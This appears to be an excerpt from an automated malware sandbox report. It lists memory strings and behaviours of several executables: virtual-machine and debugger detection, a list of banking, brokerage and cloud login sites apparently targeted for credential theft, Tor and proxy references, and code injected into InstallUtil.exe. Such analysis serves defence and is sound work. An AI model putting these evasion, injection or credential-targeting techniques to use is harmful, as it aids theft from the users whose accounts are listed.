                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: 11VBoxSFWINDIRWD
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: aryvmcixn-SR-%W
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp Binary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s|%s%s|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: main.isRunningInsideVMWare
                    Source: syncUpd.exe, 00000016.00000002.3370913149.0000000000668000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp Binary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
                    Source: InstallUtil.exe, 00000004.00000002.3387573550.0000000001508000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll885Cp
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp Binary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:***@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: tVMSrvcs|!
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp Binary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp Binary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp Binary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: \\.\HGFS`
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3278905351.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp | Binary or memory string: vmhgfsP
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp | Binary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp | Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp | Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp | Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp | Binary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe | API call chain: ExitProcess graph end node graph_14-6770
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | API call chain: ExitProcess graph end node graph_16-3625
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | API call chain: ExitProcess graph end node graph_17-18928
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | API call chain: ExitProcess graph end node graph_17-19892
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | API call chain: ExitProcess graph end node (8 such entries in the report, without graph identifiers)
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe | System information queried: ModuleInformation
                    Source: C:\Windows\System32\svchost.exe | Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe | System information queried: CodeIntegrityInformation
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe | System information queried: CodeIntegrityInformation
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep graph_17-18457
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe | Process queried: DebugPort
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe | Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009C5398 _memset,IsDebuggerPresent, 17_2_009C5398
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009D07BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 17_2_009D07BE
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 15_2_004502C0
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_00415DC0 mov eax, dword ptr fs:[00000030h] 22_2_00415DC0
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_00652E03 push dword ptr fs:[00000030h] 22_2_00652E03
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_008D6027 mov eax, dword ptr fs:[00000030h] 22_2_008D6027
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_008C0D90 mov eax, dword ptr fs:[00000030h] 22_2_008C0D90
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_008C092B mov eax, dword ptr fs:[00000030h] 22_2_008C092B
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009B69CB RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset, 17_2_009B69CB
                    Source: C:\Users\user\Desktop\file.exe | Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | Code function: 17_2_009C9B28 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_009C9B28
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_00419DC7 SetUnhandledExceptionFilter, 22_2_00419DC7
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_00417B4E
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_004173DD
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 22_2_61EAF900
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 22_2_61EAF8FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 22_2_61EAF8FC
                    Source: C:\Users\user\Desktop\file.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe | Thread created: unknown EIP: 30019A0
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe | Thread created: unknown EIP: 30619A0
                    Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe | Section loaded: NULL target: unknown protection: read write
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe | Section loaded: NULL target: unknown protection: execute and read
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe | Section loaded: NULL target: unknown protection: read write
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe | Section loaded: NULL target: unknown protection: execute and read
                    Source: C:\Users\user\Desktop\file.exe | Section unmapped: unknown base address: 400000
                    Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 404000
                    Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 406000
                    Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1085008
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp | Code function: 15_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 15_2_00478504
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe "C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe"
